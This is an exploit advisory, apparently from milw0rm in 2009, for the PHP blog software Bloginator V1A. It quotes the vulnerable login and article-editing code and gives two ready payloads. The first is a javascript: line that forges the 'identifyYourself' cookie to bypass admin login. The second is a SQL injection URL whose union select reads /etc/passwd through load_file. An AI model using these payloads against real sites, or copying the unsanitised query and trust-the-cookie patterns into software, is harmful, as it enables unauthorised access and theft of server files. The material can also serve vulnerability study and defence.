Author = FireShot , Jacopo Vuga.
Mail = fireshot<at>autistici<dot>org
Software = Bloginator V1A
Download = http://kamads.com/kamads_ads/download.php?email=bloginator&ID=0
Greets to = Osirys, Myral, str0ke
Vulnerability = Insicure Cookie Handling
[URL] www.site.com/bloginator/articleCall.php
global $name,$password,$returnLink;
$p_name = strip_tags(substr($_POST['name'],0,32));
$p_password = strip_tags(substr($_POST['password'],0,32));
if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
setcookie("identifyYourself","you are identified");
print "Login successfull<br>";
print $returnLink;
else {print "Wrong username or password";
javascript:document.cookie = "identifyYourself=you+are+identified; path=/";
Vulnerability = SQL injection
[URL] www.site.com/bloginator/articleCall.php
$action = @$_GET['action'];
$id = $_GET['id'];
function editArticle($id,$message)
global $returnLink;
$query = "select * FROM articles WHERE id='$id'";
$sql = mysql_query($query) or die(mysql_query());
$title = mysql_result($sql,0,'title');
$title = htmlentities($title);
$article = mysql_result($sql,0,'article');
$article = htmlentities($article);
$link = mysql_result($sql,0,'link');
$link = htmlentities($link);
startHTML("Edit ID # ".$id);
As Admin (Post Cookie exploit) you can inj arbitrary SQL code in the query.
www.site.com/action=edit&id=fireshot' union select 1,2,3,4,load_file('/etc/passwd'),6,7 order by '*
# milw0rm.com [2009-03-19]